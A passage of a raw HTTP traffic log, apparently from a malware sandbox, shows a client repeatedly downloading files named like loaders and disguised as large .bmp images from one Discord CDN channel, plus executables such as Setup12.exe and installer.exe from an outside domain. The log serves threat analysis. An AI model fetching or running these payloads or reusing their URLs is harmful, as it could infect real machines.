HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: application/x-msdos-program Content-Length: 2873495 Connection: keep-alive CF-Ray: 6a91d772dab50fb5-ICN Accept-Ranges: bytes Age: 15316 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Setup12.exe ETag: "8af36ff6b1f239d0fc0f82dd3d7456f1" Expires: Sat, 05 Nov 2022 00:07:23 GMT Last-Modified: Thu, 04 Nov 2021 19:01:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636052464778537 x-goog-hash: crc32c=0ksYgw== x-goog-hash: md5=ivNv9rHyOdD8D4LdPXRW8Q== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2873495 X-GUploader-UploadID: ADPycdvYr1VKpHEmMo8HFuXmvfg6QC4pFT9ofrS2FvARbOMAzYyrqm7OFz_8q36nQjg9EYbMrZGMDD0j7WXWNZldrQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEJeLctyaNY51XQilgDzfzt42eB6euAKX6G7%2FIRMRgN3Qs%2FLSMDK%2BUPXhfqj6A2bCa3aO91ZM3Q06SegiEqIZrYTuMulMPKTFkRHT434A0pO1FmOKZr4I4iRu4vUBx6j49wdqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905917017234735184/Topov0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: image/x-ms-bmp Content-Length: 3452636 Connection: keep-alive CF-Ray: 6a91d772ffb8e9cc-ICN Accept-Ranges: bytes Age: 12946 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Topov0402.bmp ETag: "8aa88d50b7897e3e2f0f3a31fdfdf4d8" Expires: Sat, 05 Nov 2022 00:07:23 GMT Last-Modified: Thu, 04 Nov 2021 20:30:48 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636057848162625 x-goog-hash: crc32c=CkfqkA== x-goog-hash: md5=iqiNULeJfj4vDzox/f302A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3452636 X-GUploader-UploadID: ADPycdtaKwaeEaHRGwzihR_hQZ6KRo_n6I5OzG41jVPkn9bYjE2wDkquAb3mnOYmHSnS0pXpTpWeFUmQMtitI0N-OA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zwjTfAIECi%2FQugPOLukCl8Wr6%2BHFSiUWIYiMAFBNoO1tlZZjXXOqkgPd025nsW8hx%2BExZ5hRhN0mVQNOa1ILsm%2F%2F3KbUFp3HPm3Vd26Hksybf%2BvrVsnegPSP2XszkWuh8n6aRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905797756076048394/IZI.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: image/x-ms-bmp Content-Length: 71612 Connection: keep-alive CF-Ray: 6a91d7731c5ee9e8-ICN Accept-Ranges: bytes Age: 41387 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=IZI.bmp ETag: "9a616358b36ca79e55f94705254f6800" Expires: Sat, 05 Nov 2022 00:07:23 GMT Last-Modified: Thu, 04 Nov 2021 12:36:53 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636029413987616 x-goog-hash: crc32c=C9Cv5Q== x-goog-hash: md5=mmFjWLNsp55V+UcFJU9oAA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 71612 X-GUploader-UploadID: ADPycdsTLdMScuUrkbkBf6Ezdx77rORrbGBSejXNRo5X5h4E2QyaYHFic8PWFZbvLsXX84izOlfDBfRXgXgdWfj2ow X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PHVrMG3IAPvGi6YW6%2FHrvCp7CrwqBodgMLcCfs8qFwuEk5J%2FSRe6Qsj661B94ann7OAfrhvmjare6A2%2FBPLJVBo1qU4X92ReNovqPTANzyLbPkBNVCOdw%2FN6UECw%2BRHYVQnHOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905757933961359380/wetsetup0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 178180 Connection: keep-alive CF-Ray: 6a91d778785e3526-ICN Accept-Ranges: bytes Age: 50627 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=wetsetup0401.bmp ETag: "f600fe66f83e4ecbdba99dfdaf92ca75" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 09:58:39 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636019919670184 x-goog-hash: crc32c=w+ul7Q== x-goog-hash: md5=9gD+Zvg+TsvbqZ39r5LKdQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 178180 X-GUploader-UploadID: ADPycdtnV8AIEkuZTLn1KQaUTghKKgCKu9uYM7SQ6ffGPNXKcrJ5etN6FeC7j4nebSmjUQw3NpISi-C0S0iqFKmIXoj0fI1MWA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0JzbexO%2F5ixVF0BsSTa0Ad30DhqqI5cDu%2F6iip4IIG2NqAcT45O81CDkqIM03Wey8Qqcx4at%2BXDRq0vIP0G2C%2FoQumzjS6A6s%2BBDv9H7nGWbiJEyygAXPthnkkek1PgDsUl22Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905857242451046431/CKBReFn.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 6658618 Connection: keep-alive CF-Ray: 6a91d778af42e9f4-ICN Accept-Ranges: bytes Age: 24679 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=CKBReFn.bmp ETag: "d1b4840031302418a5b4f644fb176442" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 16:33:16 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636043596740796 x-goog-hash: crc32c=3Ogdcg== x-goog-hash: md5=0bSEADEwJBiltPZE+xdkQg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 6658618 X-GUploader-UploadID: ADPycduLJy22GUlvlqGioYBDhsbumkmzhtnUtrh9cHNbeyE6gWVMqJH3SFuITH2H5kdtz5NZIHhKLpizLiyflCHS6g X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlKyvQiRFwVFmapMTU7ryqzAf3anQUZaDhPFS9%2FCKTw5m1EjkIGj1KbZYDoTfi11VWYiN4YVPtd4nyso3O%2ByVknt3SS%2FXJYmm7WN9qoeiV84Z3ZOsg%2FZEfJl0S2tfv9514p59g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905726762028240896/4chee.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 3535068 Connection: keep-alive CF-Ray: 6a91d778be66e9cc-ICN Accept-Ranges: bytes Age: 57556 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=4chee.bmp ETag: "f2450bebf844c7e16864edf376fbc11a" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 07:54:47 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636012487824445 x-goog-hash: crc32c=qX4c6g== x-goog-hash: md5=8kUL6/hEx+FoZO3zdvvBGg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3535068 X-GUploader-UploadID: ADPycduhvn19mnWLBi_4LatOA9uAWScoGrHYxC4ls_NerTvr2u7fyHH53NHGeqhjBK1BMXOoRWWqLTvs1lrNfDOe-N48DL-UNQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kFxfKRw%2Fr1wM4189aljJbhQFioFIkGNh1dqeqTU9DF5Ol3rKrNCX2gy5v%2FivSuZFQMG%2B%2BR9hL0fbOV%2BcH30s1PxfuSFo9HvwgoBBrSFV%2FvX16fagI8acP8v5IjAuhs4oNCy5Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905919347988508692/Passat0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 3527900 Connection: keep-alive CF-Ray: 6a91d77a6e3e0fbd-ICN Accept-Ranges: bytes Age: 11027 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Passat0402.bmp ETag: "10f92d4f497c8d410cf0dcaf9cd3e8c4" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 20:40:03 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636058403833602 x-goog-hash: crc32c=1NNsSA== x-goog-hash: md5=EPktT0l8jUEM8NyvnNPoxA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3527900 X-GUploader-UploadID: ADPycdv7or-1rDfZRPLy-GbcyFfuTuGyEvNOXdVFNG7nO_-V5lYKsgUzdjd8q0kPxkMyNUZXoeNW7jGzP8kd0rQ_YYa4wK2gJQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Srl%2BCvaDJcyJJ43sEkqyVDLfgYzzTFIMZjtcMsghvb1nbRMIZjrhOOiBRwENla8oYG2EhSAxeDTbbxBGD6jE4aJUmb9kX10GgRfWbFS87SoOS2jqOGGgNridZKbzVlVfQkcKuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905797756076048394/IZI.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 71612 Connection: keep-alive CF-Ray: 6a91d77a98f861b9-ICN Accept-Ranges: bytes Age: 41388 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=IZI.bmp ETag: "9a616358b36ca79e55f94705254f6800" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 12:36:53 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636029413987616 x-goog-hash: crc32c=C9Cv5Q== x-goog-hash: md5=mmFjWLNsp55V+UcFJU9oAA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 71612 X-GUploader-UploadID: ADPycdsTLdMScuUrkbkBf6Ezdx77rORrbGBSejXNRo5X5h4E2QyaYHFic8PWFZbvLsXX84izOlfDBfRXgXgdWfj2ow X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HdCnC4bDA5A5%2Fz4i%2FuWp%2BSQvNmzV8jiyFXbO7oVwzHf0PornjP8Xe8U%2B0zZSO86N%2FQ%2F%2FHFDl2pdA5eZXv3hnlG6wbm%2FuPx23x%2FR4pDoDi3e0v8MpWEXkx6Xu31%2BXKXRiOkeaRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905857242451046431/CKBReFn.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 6658618 Connection: keep-alive CF-Ray: 6a91d77c18850fac-ICN Accept-Ranges: bytes Age: 24679 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=CKBReFn.bmp ETag: "d1b4840031302418a5b4f644fb176442" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 16:33:16 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636043596740796 x-goog-hash: crc32c=3Ogdcg== x-goog-hash: md5=0bSEADEwJBiltPZE+xdkQg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 6658618 X-GUploader-UploadID: ADPycduLJy22GUlvlqGioYBDhsbumkmzhtnUtrh9cHNbeyE6gWVMqJH3SFuITH2H5kdtz5NZIHhKLpizLiyflCHS6g X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AgzKe%2FifO5WR07Foke0u77pMzNawFP6tAM2oKm%2BpJ8BQdreYWfhXzy4qHAc7SRliMb14jebke%2BI9xYckMTRMn7D4KGeXDCA3xXhIbZBnwBOAkUcTgQxfD%2FMRlblsadUaPhpHqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905726625025511474/sloader0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 5453828 Connection: keep-alive CF-Ray: 6a91d77c2a33351a-ICN Accept-Ranges: bytes Age: 57556 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=sloader0401.bmp ETag: "00778de7b3c7ddb3b906a5d34dc98406" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 07:54:15 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636012455146460 x-goog-hash: crc32c=e4IP7Q== x-goog-hash: md5=AHeN57PH3bO5BqXTTcmEBg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5453828 X-GUploader-UploadID: ADPycdu1ForXf3mYDfyiT2pcFSCwUB1Ap4gRhv7tFv5JqOO4WIMUNIrGq3QPXzVIDKbAyPDIHy5M6c_bbvxsCvHguKnOt8XIbA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nok6duEw%2BGy%2B0Cfsqn9w3XsMIL82%2Bl95S0ITJ2WFhAfdgeJeWiNm%2F7%2BmDOg%2ByiBIhXPIVUsIkH8BVejKA90IWeBXdr0L7LDb86NfG%2Bu%2FG%2F63NW9OMbiy8Yewc4yBBDQ%2FiVTxAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905799227140083712/real0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 616452 Connection: keep-alive CF-Ray: 6a91d77c2ebb61a1-ICN Accept-Ranges: bytes Age: 40843 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=real0402.bmp ETag: "0abbac620fc5aa6125f1f754fcfb7414" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 12:42:44 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636029764735456 x-goog-hash: crc32c=Ab97mQ== x-goog-hash: md5=CrusYg/FqmEl8fdU/Pt0FA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 616452 X-GUploader-UploadID: ADPycdv9_sIWLR0nl7xfhbI8Dn65JFajqI8JIULA-Nh3BI5yRXwDhh6sRAyX88rAf7RX_WQ30JR3K1vlcA61g0sv3A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CBiyXiVtWIK%2F8FehtSuiz3doyT5hSPYVINueNaa6QBdo%2FNgmiq2nKDwQikNxJdC%2FKXSKSnjT9eyzL9EU4y2N%2BihJW9ChLr7ZSSbSAD7hnIm%2FytYYBw7R%2BCDK61YSgNVOEl1sRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905757933961359380/wetsetup0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:24 GMT Content-Type: image/x-ms-bmp Content-Length: 178180 Connection: keep-alive CF-Ray: 6a91d77c78d661ac-ICN Accept-Ranges: bytes Age: 50627 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=wetsetup0401.bmp ETag: "f600fe66f83e4ecbdba99dfdaf92ca75" Expires: Sat, 05 Nov 2022 00:07:24 GMT Last-Modified: Thu, 04 Nov 2021 09:58:39 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636019919670184 x-goog-hash: crc32c=w+ul7Q== x-goog-hash: md5=9gD+Zvg+TsvbqZ39r5LKdQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 178180 X-GUploader-UploadID: ADPycdtnV8AIEkuZTLn1KQaUTghKKgCKu9uYM7SQ6ffGPNXKcrJ5etN6FeC7j4nebSmjUQw3NpISi-C0S0iqFKmIXoj0fI1MWA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OTyxVp0GVTWENnogcocq1yMe7G7iSWj8AaqbZZIi%2B3iXKlFOgkz9NBBLxskZi2qX4ZLSFenJsUjTOvvE8dYl3QpVOuo%2BwPm6DuvpJjTPESG%2FS8feSITFNN4%2BgJA5YnB45wSiHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /installer.exe HTTP/1.1 Host: source3.boys4dayz.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:25 GMT Content-Type: application/octet-stream Content-Length: 3628856 Connection: keep-alive last-modified: Fri, 07 May 2021 09:32:20 GMT etag: "60950924-375f38" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2334 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qse40Ji28LXg2PMcnaQGMaG%2FAkS5GCVyUz5VpnWamoisUjgjL%2B%2BaIx0NTSmoUjwz8iIfLHqR%2B0%2F836SlQSASE6%2BczpFhp9A7A3uOPrm8KhXBBeHbCRBhneNm6rSZYspxJT4KcGrB3WI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d77dce7aaf15-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /attachments/891006172130345095/905919347988508692/Passat0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:25 GMT Content-Type: image/x-ms-bmp Content-Length: 3527900 Connection: keep-alive CF-Ray: 6a91d780fd6e61a1-ICN Accept-Ranges: bytes Age: 11028 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Passat0402.bmp ETag: "10f92d4f497c8d410cf0dcaf9cd3e8c4" Expires: Sat, 05 Nov 2022 00:07:25 GMT Last-Modified: Thu, 04 Nov 2021 20:40:03 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636058403833602 x-goog-hash: crc32c=1NNsSA== x-goog-hash: md5=EPktT0l8jUEM8NyvnNPoxA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3527900 X-GUploader-UploadID: ADPycdv7or-1rDfZRPLy-GbcyFfuTuGyEvNOXdVFNG7nO_-V5lYKsgUzdjd8q0kPxkMyNUZXoeNW7jGzP8kd0rQ_YYa4wK2gJQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mlEEN%2BDgVNJi4kvWTruKbKVIirWcLEIQ%2F%2FLp%2BvyO%2FLuZJyg9mvVhnkAkAtPkUZaL7GL2z2a9iogH6Tm8SVo3NBl%2B3MNnfSVSJ5ZHmmZu%2B4QuDle5F01W6xoGsRfyF9NRuquELw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905917017234735184/Topov0402.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:25 GMT Content-Type: image/x-ms-bmp Content-Length: 3452636 Connection: keep-alive CF-Ray: 6a91d780fbfb0f98-ICN Accept-Ranges: bytes Age: 12948 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Topov0402.bmp ETag: "8aa88d50b7897e3e2f0f3a31fdfdf4d8" Expires: Sat, 05 Nov 2022 00:07:25 GMT Last-Modified: Thu, 04 Nov 2021 20:30:48 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636057848162625 x-goog-hash: crc32c=CkfqkA== x-goog-hash: md5=iqiNULeJfj4vDzox/f302A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3452636 X-GUploader-UploadID: ADPycdtaKwaeEaHRGwzihR_hQZ6KRo_n6I5OzG41jVPkn9bYjE2wDkquAb3mnOYmHSnS0pXpTpWeFUmQMtitI0N-OA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: 